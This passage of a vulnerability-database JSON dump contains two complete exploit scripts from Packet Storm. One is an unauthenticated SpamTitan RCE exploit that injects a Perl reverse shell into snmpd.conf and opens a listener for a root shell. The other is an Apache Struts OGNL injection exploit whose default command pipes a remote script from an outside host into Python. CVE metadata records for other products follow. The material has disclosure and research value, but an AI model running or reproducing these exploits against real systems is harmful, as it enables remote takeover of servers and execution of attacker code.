inject command directives into the \nfile snmpd.conf. This would allow executing commands on the target server by \nby injecting an \"extend\" or \"exec\" SNMPD directive and querying the snmp daemon \nof the server for the correct OID. \n \nIII. PoC \n~~~~~~~ \n \nUse python 3 and install the following modules: requests, pysnmp. \nIf your IP is 192.168.1.5 and the target SpamTitan server is \nspamtitan.example.com, call the PoC like this: \n./poc.py -t spamtitan.example.com -i 192.168.1.5 \n \n--------------------------------------------- \n \n#!/usr/bin/env python \n \n# Author: Felipe Molina (@felmoltor) \n# Date: 09/04/2020 \n# Python Version: 3.7 \n# Summary: This is PoC for an unauthenticated RCE 0day on SpamTitan \n7.07 and previous versions. \n# The script abuses of two weaknesses on the product: \n# 1. Unauthenticated interaction with snmp-x.php script \n# 2. Injection of snmpd.conf configuration directives in multiple POST \nparameters such as \"community\" or \"user_username\" of snmp-x.php \n# Product URL: https://www.spamtitan.com/ \n# Product Version: 7.07 and probably previous \n \nimport requests \nrequests.packages.urllib3.disable_warnings() \nimport os \nimport threading \nfrom optparse import OptionParser \nimport socket \nimport json \nfrom pysnmp.hlapi import * \nfrom urllib.parse import urlparse \nfrom time import sleep \n \nSNMPGETDELAY=5 \n \ndef parseoptions(): \nparser = OptionParser() \nparser.add_option(\"-t\", \"--target\", dest=\"target\", \nhelp=\"Target SpamTitan URL to attack. E.g.: \nhttps://spamtitan.com/\", default=None) \nparser.add_option(\"-i\", \"--ip\", dest=\"ip\", \nhelp=\"Local IP where to listen for the reverse \nshell. Default: %s\" % myip(), default=myip()) \nparser.add_option(\"-p\", \"--port\", dest=\"port\", \nhelp=\"Local Port where to listen for the reverse \nshell. Default: 4242\", default=4242) \nparser.add_option(\"-q\", \"--quiet\", \naction=\"store_true\", dest=\"quiet\", default=False, \nhelp=\"Shut up script! Just give me the shell.\") \n \nreturn parser.parse_args() \n \ndef printmsg(msg,quiet=False,msgtype=\"i\"): \nif (not quiet): \nif (success): \nprint(\"[%s] %s\" % (msgtype,msg)) \nelse: \nprint(\"[-] %s\" % msg) \n \ndef info(msg,quiet=False): \nprintmsg(msg,quiet,msgtype=\"i\") \n \ndef success(msg,quiet=False): \nprintmsg(msg,quiet,msgtype=\"+\") \n \ndef fail(msg,quiet=False): \nprintmsg(msg,quiet,msgtype=\"-\") \n \ndef myip(): \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \ntry: \n# doesn't even have to be reachable \ns.connect(('10.255.255.255', 1)) \nIP = s.getsockname()[0] \nexcept: \nIP = '127.0.0.1' \nfinally: \ns.close() \nreturn IP \n \n \ndef shellServer(ip,port,quiet): \nservers = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nservers.bind((ip, port)) \nservers.listen(1) \ninfo(\"Waiting for incoming connection on %s:%s\" % (ip,port)) \nconn, addr = servers.accept() \nconn.settimeout(1) \nsuccess(\"Hurray, we got a connection from %s\" % addr[0]) \n \nprompt =conn.recv(128) \nprompt=str(prompt.decode(\"utf-8\")).strip() \ncommand = input(prompt) \n \nwhile True: \ntry: \nc = \"%s\\n\" % (command) \nif (len(c)>0): \nconn.sendall(c.encode(\"utf-8\")) \n# Quit the console \nif command == 'exit': \ninfo(\"\\nClosing connection\") \nconn.close() \nbreak \nelse: \ncompleteanswer=\"\" \nwhile True: \nanswer=None \ntry: \nanswer=str((conn.recv(1024)).decode(\"utf-8\")) \ncompleteanswer+=answer \nexcept socket.timeout: \ncompleteanswer.strip() \nbreak \nprint(completeanswer,end='') \ncommand = input(\"\") \nexcept (KeyboardInterrupt, EOFError): \ninfo(\"\\nClosing connection\") \nbreak \n \ndef triggerSNMPShell(target, community, triggeroid, port, quiet): \nif (not quiet): \nprint(\"Waiting %s seconds to allow the main thread set-up the \nshell listener.\" % SNMPGETDELAY) \n# Give the parent thread a few seconds to set up the shell \nlistener before triggering the SNMP get query \nsleep(SNMPGETDELAY) \nif (not quiet): \nprint(\"Querying the SNMP server to launch the shell.\") \ntargetp = urlparse(target) \nerrorIndication, errorStatus, errorIndex, varBinds = next( \ngetCmd(SnmpEngine(), \nCommunityData(community, mpModel=0), \nUdpTransportTarget((targetp.netloc, port)), \nContextData(), \nObjectType(ObjectIdentity(triggeroid))) \n) \nif errorIndication: \nprint(\"SNMP error: %s\" % errorIndication) \nelif errorStatus: \nprint('SNMP error status: %s at %s' % (errorStatus.prettyPrint(), \nerrorIndex and varBinds[int(errorIndex) - \n1][0] or '?')) \n \ndef main(): \n(options,arguments) = parseoptions() \nq = options.quiet \nt = options.target \ni = options.ip \np = options.port \ncommunity=\"dummy\" \n \nif (t is None): \nprint(\"[-] Error. Specify a target (-t).\") \nexit() \n \nif ((not \"http://\" in t) and (not \"https://\" in t)): \nt = \"http://%s/snmp-x.php\" % t \nelse: \nt = \"%s/snmp-x.php\" % t \n \nif (not q): \nprint(\"[+] Attacking: %s.\\nReceiving shell in %s:%s\" % (t,i,p)) \n \nTARGETOID=\".1.3.6.1.4.1.8072.1.3.2.3.1.1.8.114.101.118.115.104.101.108.108\" \n# PAYLOAD=\"extend revshell /usr/bin/perl -e 'use \nSocket;$i=\\\"%s\\\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh \n-i\\\");};'\" % (i,p) \nPAYLOAD=\"extend revshell /usr/bin/perl -e 'use \nSocket;$i=\\\"%s\\\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh \n-i\\\");};'\" % (i,p) \nTOGGLESNMP={ \n\"jaction\":\"toggleSNMP\", \n\"newval\":\"1\" \n} \nINJECTION={ \n\"jaction\":\"saveAll\", \n\"contact\":\"CONTACT\", \n\"name\":\"SpamTitan\", \n\"location\":\"LOCATION\", \n# Add our IP as allowed to query the injected \"dummy\" community \n# Add also the perl payload in a new line (%0a) of the snmpd.conf file \n\"community\":'%s\" %s\\n%s # ' % (community,i,PAYLOAD) \n} \n \nrev_thread = threading.Thread(target=triggerSNMPShell, args=(t, \ncommunity, TARGETOID, 161,q)) \nrev_thread.start() \n \n# Start a thread to listen for incoming reverse shells: \nif (not q): \nprint(\"[+] Launching a reverse shell listener to wait for the shell.\") \n \n# Send the SNMP request to add a community and append an \"extend\" \ncommand to execute scripts \n# SpamTitan would add a new line in the snmpd.conf file with the \nnew community name and the \"extend\" script \ninj_res = requests.post(t,INJECTION,verify=False) \nif (inj_res.status_code == 200): \nif (not q): \nprint(\"Spawning a reverse shell listener. Wait for it...\") \nshellServer(options.ip,int(options.port),options.quiet) \nelse: \nprint(\"Error. The target is probably not vulnerable (returned \na %s code).\" % inj_res.status_code) \n \nmain() \n \n--------------------------------------------- \n \nIII. Impact \n~~~~~~~~~~ \n \nThe snmpd daemon is running as root in the target server. The \npressented PoC would return a root shell without need of any \nregistered user in the target server. There is total loss of \nconfidentiality, integrity and availability on the SpamTitan server. \n \nIV. Disclosure \n~~~~~~~~~~~~~ \n \nReported By: Felipe Molina de la Torre \n \nVendor Informed: 2020-04-17 \nPatch Release Date: 2020-05-26 \nAdvisory Release Date: 2019-09-18 \n \nV. References \n~~~~~~~~~~~~ \n* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698 \n* https://sensepost.com/blog/2020/clash-of-the-spamtitan/ \n \n---------------------------------[SPUK-2020-09/SpamTitan \nUnauthenticated Remote Code Execution in snmp-x.php]--- \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159470/spamtitan707snmp-exec.txt"}, {"lastseen": "2020-11-18T03:43:19", "description": "", "cvss3": {}, "published": "2020-11-17T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.5.20 Double OGNL Evaluation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-0230"], "modified": "2020-11-17T00:00:00", "id": "PACKETSTORM:160108", "href": "https://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html", "sourceData": "`# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation \n# Date: 08/18/2020 \n# Exploit Author: West Shepherd \n# Vendor Homepage: https://struts.apache.org/download.cgi \n# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) \n# CVE : CVE-2019-0230 \n# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. \n# Source(s): \n# https://github.com/PrinceFPF/CVE-2019-0230 \n# https://cwiki.apache.org/confluence/display/WW/S2-059 \n# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 \n \n# !/usr/bin/python \nfrom sys import argv, exit, stdout, stderr \nimport argparse \nimport requests \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nimport logging \n \n \nclass Exploit: \ndef __init__( \nself, \ntarget='', \nredirect=False, \nproxy_address='' \n): \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nself.target = target \nself.session = requests.session() \nself.redirect = redirect \nself.timeout = 0.5 \nself.proxies = { \n'http': 'http://%s' % proxy_address, \n'https': 'http://%s' % proxy_address \n} \\ \nif proxy_address is not None \\ \nand proxy_address != '' else {} \nself.query_params = {} \nself.form_values = {} \nself.cookies = {} \nboundary = \"---------------------------735323031399963166993862150\" \nself.headers = { \n'Content-Type': 'multipart/form-data; boundary=%s' % boundary, \n'Accept': '*/*', \n'Connection': 'close' \n} \npayload = \"%{(#nike='multipart/form-data').\" \\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \\ \n\"(#_memberAccess?(#_memberAccess=#dm):\" \\ \n \n\"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \n\\ \n \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \n\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\" \\ \n\"(#ognlUtil.getExcludedClasses().clear()).\" \\ \n\"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').\" \\ \n \n\"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\" \n\\ \n \n\"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\" \\ \n\"(#p=new \njava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).\" \\ \n \n\"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" \n\\ \n \n\"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\" \n\\ \n\"(#ros.flush())}\" \n \nself.payload = \"--%s\\r\\nContent-Disposition: form-data; \nname=\\\"foo\\\"; \" \\ \n\"filename=\\\"%s\\0b\\\"\\r\\nContent-Type: \ntext/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % ( \nboundary, payload, boundary \n) \n \ndef do_get(self, url, params=None, data=None): \nreturn self.session.get( \nurl=url, \nverify=False, \nallow_redirects=self.redirect, \nheaders=self.headers, \ncookies=self.cookies, \nproxies=self.proxies, \ndata=data, \nparams=params \n) \n \ndef do_post(self, url, data=None, params=None): \nreturn self.session.post( \nurl=url, \ndata=data, \nverify=False, \nallow_redirects=self.redirect, \nheaders=self.headers, \ncookies=self.cookies, \nproxies=self.proxies, \nparams=params \n) \n \ndef debug(self): \ntry: \nimport http.client as http_client \nexcept ImportError: \nimport httplib as http_client \nhttp_client.HTTPConnection.debuglevel = 1 \nlogging.basicConfig() \nlogging.getLogger().setLevel(logging.DEBUG) \nrequests_log = logging.getLogger(\"requests.packages.urllib3\") \nrequests_log.setLevel(logging.DEBUG) \nrequests_log.propagate = True \nreturn self \n \ndef send_payload(self, command='curl --insecure -sv \nhttps://10.10.10.10/shell.py|python -'): \nurl = self.target \nstdout.write('sending payload to %s payload %s' % (url, command)) \nresp = self.do_post(url=url, params=self.query_params, \ndata=self.payload.replace('{COMMAND}', command)) \nreturn resp \n \n \nif __name__ == '__main__': \nparser = argparse.ArgumentParser(add_help=True, \ndescription='CVE-2020-0230 Struts \n2 exploit') \ntry: \nparser.add_argument('-target', action='store', help='Target \naddress: http(s)://target.com/index.action') \nparser.add_argument('-command', action='store', \nhelp='Command to execute: touch /tmp/pwn') \nparser.add_argument('-debug', action='store', default=False, \nhelp='Enable debugging: False') \nparser.add_argument('-proxy', action='store', default='', \nhelp='Enable proxy: 10.10.10.10:8080') \n \nif len(argv) == 1: \nparser.print_help() \nexit(1) \noptions = parser.parse_args() \n \nexp = Exploit( \nproxy_address=options.proxy, \ntarget=options.target \n) \n \nif options.debug: \nexp.debug() \nstdout.write('target %s debug %s proxy %s\\n' % ( \noptions.target, options.debug, options.proxy \n)) \n \nresult = exp.send_payload(command=options.command) \nstdout.write('Response: %d\\n' % result.status_code) \n \nexcept Exception as error: \n \nstderr.write('error in main %s' % str(error)) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160108/apachestruts2520-eval.txt"}], "cve": [{"lastseen": "2023-06-06T14:48:26", "description": "The easy-wp-smtp plugin before 1.4.4 for WordPress allows Administrator account takeover, as exploited in the wild in December 2020. If an attacker can list the wp-content/plugins/easy-wp-smtp/ directory, then they can discover a log file (such as #############_debug_log.txt) that contains all password-reset links. The attacker can request a reset of the Administrator password and then use a link found there.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-14T03:15:00", "type": "cve", "title": "CVE-2020-35234", "cwe": ["CWE-532"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35234"], "modified": "2020-12-15T23:45:00", "cpe": [], "id": "CVE-2020-35234", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35234", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-06-06T14:16:55", "description": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-13T22:15:00", "type": "cve", "title": "CVE-2020-11738", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2022-10-05T16:54:00", "cpe": [], "id": "CVE-2020-11738", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-06-06T15:03:37", "description": "A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T13:15:00", "type": "cve", "title": "CVE-2020-8260", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260"], "modified": "2021-09-21T17:04:00", "cpe": ["cpe:/a:pulsesecure:pulse_secure_desktop_client:9.1"], "id": "CVE-2020-8260", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8260", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4.2:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4.1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r6:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r8:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r8.2:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:-:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r7:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r3.1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r5:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r3:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r7.1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r2:*:*:*:linux:*:*"]}, {"lastseen": "2023-06-06T14:31:22", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T02:15:00", "type": "cve", "title": "CVE-2020-17530", "cwe": ["CWE-917"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-03T16:38:00", "cpe": ["cpe:/a:oracle:communications_diameter_intelligence_hub:8.1.0", "cpe:/a:oracle:communications_diameter_intelligence_hub:8.2.0", "cpe:/a:oracle:communications_diameter_intelligence_hub:8.0.0", "cpe:/a:oracle:financial_services_data_integration_hub:8.0.6", "cpe:/a:oracle:business_intelligence:12.2.1.3.0", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.23", "cpe:/a:oracle:communications_policy_management:12.5.0", "cpe:/a:oracle:hospitality_opera_5:5.6", "cpe:/a:oracle:business_intelligence:12.2.1.4.0", "cpe:/a:oracle:financial_services_data_integration_hub:8.0.3", "cpe:/a:oracle:communications_pricing_design_center:12.0.0.3.0", "cpe:/a:oracle:communications_diameter_intelligence_hub:8.2.3"], "id": "CVE-2020-17530", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17530", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:hospitality_opera_5:5.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_diameter_intelligence_hub:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_policy_management:12.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:communications_diameter_intelligence_hub:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_diameter_intelligence_hub:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:communications_diameter_intelligence_hub:8.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:16:47", "description": "An issue was discovered in Titan SpamTitan 7.07. Improper input sanitization of the parameter community on the page snmp-x.php would allow a remote attacker to inject commands into the file snmpd.conf that would allow executing commands on the target server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-17T17:15:00", "type": "cve", "title": "CVE-2020-11698", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11698"], "modified": "2022-04-28T18:33:00", "cpe": ["cpe:/a:titanhq:spamtitan:7.07"], "id": "CVE-2020-11698", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11698", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:titanhq:spamtitan:7.07:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T14:20:44", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T17:15:00", "type": "cve", "title": "CVE-2019-0230", "cwe": ["CWE-1321"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2022-12-02T19:47:00", "cpe": ["cpe:/a:oracle:financial_services_data_integration_hub:8.0.6", "cpe:/a:oracle:financial_services_market_risk_measurement_and_management:8.0.6", "cpe:/a:apache:struts:2.5.20", "cpe:/a:oracle:communications_policy_management:12.5.0", "cpe:/a:oracle:financial_services_data_integration_hub:8.0.3", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.23"], "id": "CVE-2019-0230", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_policy_management:12.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:43:21", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T16:15:00", "type": "cve", "title": "CVE-2021-31805", "cwe": ["CWE-917"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-07-25T18:15:00", "cpe": ["cpe:/a:apache:struts:2.5.29"], "id": "CVE-2021-31805", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31805", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.5.29:*:*:*:*:*:*:*"]}], "ibm": [{"lastseen": "2023-07-12T09:36:43", "description": "## Summary\n\nMultiple vulnerabilities in Apache Struts 2.3.x may 